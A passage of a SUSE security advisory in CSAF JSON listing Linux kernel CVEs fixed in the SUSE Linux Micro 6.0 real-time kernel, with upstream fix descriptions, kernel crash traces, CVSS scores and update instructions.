Trace:\n\u003cIRQ\u003e\ndump_stack_lvl+0xd9/0x150\nprint_address_description.constprop.0+0x2c/0x3c0\nkasan_report+0x11d/0x130\ndecode_session6+0x103f/0x1890\n__xfrm_decode_session+0x54/0xb0\nvti6_tnl_xmit+0x3e6/0x1ee0\ndev_hard_start_xmit+0x187/0x700\nsch_direct_xmit+0x1a3/0xc30\n__qdisc_run+0x510/0x17a0\n__dev_queue_xmit+0x2215/0x3b10\nneigh_connected_output+0x3c2/0x550\nip6_finish_output2+0x55a/0x1550\nip6_finish_output+0x6b9/0x1270\nip6_output+0x1f1/0x540\nndisc_send_skb+0xa63/0x1890\nndisc_send_rs+0x132/0x6f0\naddrconf_rs_timer+0x3f1/0x870\ncall_timer_fn+0x1a0/0x580\nexpire_timers+0x29b/0x4b0\nrun_timer_softirq+0x326/0x910\n__do_softirq+0x1d4/0x905\nirq_exit_rcu+0xb7/0x120\nsysvec_apic_timer_interrupt+0x97/0xc0\n\u003c/IRQ\u003e\nAllocated by task 9176:\nkasan_save_stack+0x22/0x40\nkasan_set_track+0x25/0x30\n__kasan_slab_alloc+0x7f/0x90\nkmem_cache_alloc_node+0x1cd/0x410\nkmalloc_reserve+0x165/0x270\n__alloc_skb+0x129/0x330\nnetlink_sendmsg+0x9b1/0xe30\nsock_sendmsg+0xde/0x190\n____sys_sendmsg+0x739/0x920\n___sys_sendmsg+0x110/0x1b0\n__sys_sendmsg+0xf7/0x1c0\ndo_syscall_64+0x39/0xb0\nentry_SYSCALL_64_after_hwframe+0x63/0xcd\nFreed by task 9176:\nkasan_save_stack+0x22/0x40\nkasan_set_track+0x25/0x30\nkasan_save_free_info+0x2b/0x40\n____kasan_slab_free+0x160/0x1c0\nslab_free_freelist_hook+0x11b/0x220\nkmem_cache_free+0xf0/0x490\nskb_free_head+0x17f/0x1b0\nskb_release_data+0x59c/0x850\nconsume_skb+0xd2/0x170\nnetlink_unicast+0x54f/0x7f0\nnetlink_sendmsg+0x926/0xe30\nsock_sendmsg+0xde/0x190\n____sys_sendmsg+0x739/0x920\n___sys_sendmsg+0x110/0x1b0\n__sys_sendmsg+0xf7/0x1c0\ndo_syscall_64+0x39/0xb0\nentry_SYSCALL_64_after_hwframe+0x63/0xcd\nThe buggy address belongs to the object at ffff88802e08ed00\nwhich belongs to the cache skbuff_small_head of size 640\nThe buggy address is located 194 bytes inside of\nfreed 640-byte region [ffff88802e08ed00, ffff88802e08ef80)\n\nAs commit f855691975bb (\"xfrm6: Fix the nexthdr offset in\n_decode_session6.\") showed, xfrm_decode_session was originally intended\nonly for the receive path. IP6CB(skb)-\u003enhoff is not set during\ntransmission. Therefore, set the cb field in the skb to 0 before\nsending packets.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53821",
"url": "https://www.suse.com/security/cve/CVE-2023-53821"
},
{
"category": "external",
"summary": "SUSE Bug 1254669 for CVE-2023-53821",
"url": "https://bugzilla.suse.com/1254669"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53821"
},
{
"cve": "CVE-2023-53823",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53823"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock/rq_qos: protect rq_qos apis with a new lock\n\ncommit 50e34d78815e (\"block: disable the elevator int del_gendisk\")\nmove rq_qos_exit() from disk_release() to del_gendisk(), this will\nintroduce some problems:\n\n1) If rq_qos_add() is triggered by enabling iocost/iolatency through\n cgroupfs, then it can concurrent with del_gendisk(), it\u0027s not safe to\n write \u0027q-\u003erq_qos\u0027 concurrently.\n\n2) Activate cgroup policy that is relied on rq_qos will call\n rq_qos_add() and blkcg_activate_policy(), and if rq_qos_exit() is\n called in the middle, null-ptr-dereference will be triggered in\n blkcg_activate_policy().\n\n3) blkg_conf_open_bdev() can call blkdev_get_no_open() first to find the\n disk, then if rq_qos_exit() from del_gendisk() is done before\n rq_qos_add(), then memory will be leaked.\n\nThis patch add a new disk level mutex \u0027rq_qos_mutex\u0027:\n\n1) The lock will protect rq_qos_exit() directly.\n\n2) For wbt that doesn\u0027t relied on blk-cgroup, rq_qos_add() can only be\n called from disk initialization for now because wbt can\u0027t be\n destructed until rq_qos_exit(), so it\u0027s safe not to protect wbt for\n now. Hoever, in case that rq_qos dynamically destruction is supported\n in the furture, this patch also protect rq_qos_add() from wbt_init()\n directly, this is enough because blk-sysfs already synchronize\n writers with disk removal.\n\n3) For iocost and iolatency, in order to synchronize disk removal and\n cgroup configuration, the lock is held after blkdev_get_no_open()\n from blkg_conf_open_bdev(), and is released in blkg_conf_exit().\n In order to fix the above memory leak, disk_live() is checked after\n holding the new lock.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53823",
"url": "https://www.suse.com/security/cve/CVE-2023-53823"
},
{
"category": "external",
"summary": "SUSE Bug 1254691 for CVE-2023-53823",
"url": "https://bugzilla.suse.com/1254691"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53823"
},
{
"cve": "CVE-2023-53825",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53825"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nkcm: Fix error handling for SOCK_DGRAM in kcm_sendmsg().\n\nsyzkaller found a memory leak in kcm_sendmsg(), and commit c821a88bd720\n(\"kcm: Fix memory leak in error path of kcm_sendmsg()\") suppressed it by\nupdating kcm_tx_msg(head)-\u003elast_skb if partial data is copied so that the\nfollowing sendmsg() will resume from the skb.\n\nHowever, we cannot know how many bytes were copied when we get the error.\nThus, we could mess up the MSG_MORE queue.\n\nWhen kcm_sendmsg() fails for SOCK_DGRAM, we should purge the queue as we\ndo so for UDP by udp_flush_pending_frames().\n\nEven without this change, when the error occurred, the following sendmsg()\nresumed from a wrong skb and the queue was messed up. However, we have\nyet to get such a report, and only syzkaller stumbled on it. So, this\ncan be changed safely.\n\nNote this does not change SOCK_SEQPACKET behaviour.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53825",
"url": "https://www.suse.com/security/cve/CVE-2023-53825"
},
{
"category": "external",
"summary": "SUSE Bug 1254707 for CVE-2023-53825",
"url": "https://bugzilla.suse.com/1254707"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53825"
},
{
"cve": "CVE-2023-53828",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53828"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_sync: Avoid use-after-free in dbg for hci_add_adv_monitor()\n\nKSAN reports use-after-free in hci_add_adv_monitor().\n\nWhile adding an adv monitor,\n hci_add_adv_monitor() calls -\u003e\n msft_add_monitor_pattern() calls -\u003e\n msft_add_monitor_sync() calls -\u003e\n msft_le_monitor_advertisement_cb() calls in an error case -\u003e\n hci_free_adv_monitor() which frees the *moniter.\n\nThis is referenced by bt_dev_dbg() in hci_add_adv_monitor().\n\nFix the bt_dev_dbg() by using handle instead of monitor-\u003ehandle.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53828",
"url": "https://www.suse.com/security/cve/CVE-2023-53828"
},
{
"category": "external",
"summary": "SUSE Bug 1254623 for CVE-2023-53828",
"url": "https://bugzilla.suse.com/1254623"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53828"
},
{
"cve": "CVE-2023-53831",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53831"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: read sk-\u003esk_family once in sk_mc_loop()\n\nsyzbot is playing with IPV6_ADDRFORM quite a lot these days,\nand managed to hit the WARN_ON_ONCE(1) in sk_mc_loop()\n\nWe have many more similar issues to fix.\n\nWARNING: CPU: 1 PID: 1593 at net/core/sock.c:782 sk_mc_loop+0x165/0x260\nModules linked in:\nCPU: 1 PID: 1593 Comm: kworker/1:3 Not tainted 6.1.40-syzkaller #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/26/2023\nWorkqueue: events_power_efficient gc_worker\nRIP: 0010:sk_mc_loop+0x165/0x260 net/core/sock.c:782\nCode: 34 1b fd 49 81 c7 18 05 00 00 4c 89 f8 48 c1 e8 03 42 80 3c 20 00 74 08 4c 89 ff e8 25 36 6d fd 4d 8b 37 eb 13 e8 db 33 1b fd \u003c0f\u003e 0b b3 01 eb 34 e8 d0 33 1b fd 45 31 f6 49 83 c6 38 4c 89 f0 48\nRSP: 0018:ffffc90000388530 EFLAGS: 00010246\nRAX: ffffffff846d9b55 RBX: 0000000000000011 RCX: ffff88814f884980\nRDX: 0000000000000102 RSI: ffffffff87ae5160 RDI: 0000000000000011\nRBP: ffffc90000388550 R08: 0000000000000003 R09: ffffffff846d9a65\nR10: 0000000000000002 R11: ffff88814f884980 R12: dffffc0000000000\nR13: ffff88810dbee000 R14: 0000000000000010 R15: ffff888150084000\nFS: 0000000000000000(0000) GS:ffff8881f6b00000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000020000180 CR3: 000000014ee5b000 CR4: 00000000003506e0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n\u003cIRQ\u003e\n[\u003cffffffff8507734f\u003e] ip6_finish_output2+0x33f/0x1ae0 net/ipv6/ip6_output.c:83\n[\u003cffffffff85062766\u003e] __ip6_finish_output net/ipv6/ip6_output.c:200 [inline]\n[\u003cffffffff85062766\u003e] ip6_finish_output+0x6c6/0xb10 net/ipv6/ip6_output.c:211\n[\u003cffffffff85061f8c\u003e] NF_HOOK_COND include/linux/netfilter.h:298 [inline]\n[\u003cffffffff85061f8c\u003e] ip6_output+0x2bc/0x3d0 net/ipv6/ip6_output.c:232\n[\u003cffffffff852071cf\u003e] dst_output include/net/dst.h:444 [inline]\n[\u003cffffffff852071cf\u003e] ip6_local_out+0x10f/0x140 net/ipv6/output_core.c:161\n[\u003cffffffff83618fb4\u003e] ipvlan_process_v6_outbound drivers/net/ipvlan/ipvlan_core.c:483 [inline]\n[\u003cffffffff83618fb4\u003e] ipvlan_process_outbound drivers/net/ipvlan/ipvlan_core.c:529 [inline]\n[\u003cffffffff83618fb4\u003e] ipvlan_xmit_mode_l3 drivers/net/ipvlan/ipvlan_core.c:602 [inline]\n[\u003cffffffff83618fb4\u003e] ipvlan_queue_xmit+0x1174/0x1be0 drivers/net/ipvlan/ipvlan_core.c:677\n[\u003cffffffff8361ddd9\u003e] ipvlan_start_xmit+0x49/0x100 drivers/net/ipvlan/ipvlan_main.c:229\n[\u003cffffffff84763fc0\u003e] netdev_start_xmit include/linux/netdevice.h:4925 [inline]\n[\u003cffffffff84763fc0\u003e] xmit_one net/core/dev.c:3644 [inline]\n[\u003cffffffff84763fc0\u003e] dev_hard_start_xmit+0x320/0x980 net/core/dev.c:3660\n[\u003cffffffff8494c650\u003e] sch_direct_xmit+0x2a0/0x9c0 net/sched/sch_generic.c:342\n[\u003cffffffff8494d883\u003e] qdisc_restart net/sched/sch_generic.c:407 [inline]\n[\u003cffffffff8494d883\u003e] __qdisc_run+0xb13/0x1e70 net/sched/sch_generic.c:415\n[\u003cffffffff8478c426\u003e] qdisc_run+0xd6/0x260 include/net/pkt_sched.h:125\n[\u003cffffffff84796eac\u003e] net_tx_action+0x7ac/0x940 net/core/dev.c:5247\n[\u003cffffffff858002bd\u003e] __do_softirq+0x2bd/0x9bd kernel/softirq.c:599\n[\u003cffffffff814c3fe8\u003e] invoke_softirq kernel/softirq.c:430 [inline]\n[\u003cffffffff814c3fe8\u003e] __irq_exit_rcu+0xc8/0x170 kernel/softirq.c:683\n[\u003cffffffff814c3f09\u003e] irq_exit_rcu+0x9/0x20 kernel/softirq.c:695",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53831",
"url": "https://www.suse.com/security/cve/CVE-2023-53831"
},
{
"category": "external",
"summary": "SUSE Bug 1254701 for CVE-2023-53831",
"url": "https://bugzilla.suse.com/1254701"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53831"
},
{
"cve": "CVE-2023-53834",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53834"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niio: adc: ina2xx: avoid NULL pointer dereference on OF device match\n\nThe affected lines were resulting in a NULL pointer dereference on our\nplatform because the device tree contained the following list of\ncompatible strings:\n\n power-sensor@40 {\n compatible = \"ti,ina232\", \"ti,ina231\";\n ...\n };\n\nSince the driver doesn\u0027t declare a compatible string \"ti,ina232\", the OF\nmatching succeeds on \"ti,ina231\". But the I2C device ID info is\npopulated via the first compatible string, cf. modalias population in\nof_i2c_get_board_info(). Since there is no \"ina232\" entry in the legacy\nI2C device ID table either, the struct i2c_device_id *id pointer in the\nprobe function is NULL.\n\nFix this by using the already populated type variable instead, which\npoints to the proper driver data. Since the name is also wanted, add a\ngeneric one to the ina2xx_config table.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53834",
"url": "https://www.suse.com/security/cve/CVE-2023-53834"
},
{
"category": "external",
"summary": "SUSE Bug 1254660 for CVE-2023-53834",
"url": "https://bugzilla.suse.com/1254660"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53834"
},
{
"cve": "CVE-2023-53836",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53836"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf, sockmap: Fix skb refcnt race after locking changes\n\nThere is a race where skb\u0027s from the sk_psock_backlog can be referenced\nafter userspace side has already skb_consumed() the sk_buff and its refcnt\ndropped to zer0 causing use after free.\n\nThe flow is the following:\n\n while ((skb = skb_peek(\u0026psock-\u003eingress_skb))\n sk_psock_handle_Skb(psock, skb, ..., ingress)\n if (!ingress) ...\n sk_psock_skb_ingress\n sk_psock_skb_ingress_enqueue(skb)\n msg-\u003eskb = skb\n sk_psock_queue_msg(psock, msg)\n skb_dequeue(\u0026psock-\u003eingress_skb)\n\nThe sk_psock_queue_msg() puts the msg on the ingress_msg queue. This is\nwhat the application reads when recvmsg() is called. An application can\nread this anytime after the msg is placed on the queue. The recvmsg hook\nwill also read msg-\u003eskb and then after user space reads the msg will call\nconsume_skb(skb) on it effectively free\u0027ing it.\n\nBut, the race is in above where backlog queue still has a reference to\nthe skb and calls skb_dequeue(). If the skb_dequeue happens after the\nuser reads and free\u0027s the skb we have a use after free.\n\nThe !ingress case does not suffer from this problem because it uses\nsendmsg_*(sk, msg) which does not pass the sk_buff further down the\nstack.\n\nThe following splat was observed with \u0027test_progs -t sockmap_listen\u0027:\n\n [ 1022.710250][ T2556] general protection fault, ...\n [...]\n [ 1022.712830][ T2556] Workqueue: events sk_psock_backlog\n [ 1022.713262][ T2556] RIP: 0010:skb_dequeue+0x4c/0x80\n [ 1022.713653][ T2556] Code: ...\n [...]\n [ 1022.720699][ T2556] Call Trace:\n [ 1022.720984][ T2556] \u003cTASK\u003e\n [ 1022.721254][ T2556] ? die_addr+0x32/0x80^M\n [ 1022.721589][ T2556] ? exc_general_protection+0x25a/0x4b0\n [ 1022.722026][ T2556] ? asm_exc_general_protection+0x22/0x30\n [ 1022.722489][ T2556] ? skb_dequeue+0x4c/0x80\n [ 1022.722854][ T2556] sk_psock_backlog+0x27a/0x300\n [ 1022.723243][ T2556] process_one_work+0x2a7/0x5b0\n [ 1022.723633][ T2556] worker_thread+0x4f/0x3a0\n [ 1022.723998][ T2556] ? __pfx_worker_thread+0x10/0x10\n [ 1022.724386][ T2556] kthread+0xfd/0x130\n [ 1022.724709][ T2556] ? __pfx_kthread+0x10/0x10\n [ 1022.725066][ T2556] ret_from_fork+0x2d/0x50\n [ 1022.725409][ T2556] ? __pfx_kthread+0x10/0x10\n [ 1022.725799][ T2556] ret_from_fork_asm+0x1b/0x30\n [ 1022.726201][ T2556] \u003c/TASK\u003e\n\nTo fix we add an skb_get() before passing the skb to be enqueued in the\nengress queue. This bumps the skb-\u003eusers refcnt so that consume_skb()\nand kfree_skb will not immediately free the sk_buff. With this we can\nbe sure the skb is still around when we do the dequeue. Then we just\nneed to decrement the refcnt or free the skb in the backlog case which\nwe do by calling kfree_skb() on the ingress case as well as the sendmsg\ncase.\n\nBefore locking change from fixes tag we had the sock locked so we\ncouldn\u0027t race with user and there was no issue here.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53836",
"url": "https://www.suse.com/security/cve/CVE-2023-53836"
},
{
"category": "external",
"summary": "SUSE Bug 1254693 for CVE-2023-53836",
"url": "https://bugzilla.suse.com/1254693"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53836"
},
{
"cve": "CVE-2023-53839",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53839"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndccp: fix data-race around dp-\u003edccps_mss_cache\n\ndccp_sendmsg() reads dp-\u003edccps_mss_cache before locking the socket.\nSame thing in do_dccp_getsockopt().\n\nAdd READ_ONCE()/WRITE_ONCE() annotations,\nand change dccp_sendmsg() to check again dccps_mss_cache\nafter socket is locked.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53839",
"url": "https://www.suse.com/security/cve/CVE-2023-53839"
},
{
"category": "external",
"summary": "SUSE Bug 1254655 for CVE-2023-53839",
"url": "https://bugzilla.suse.com/1254655"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
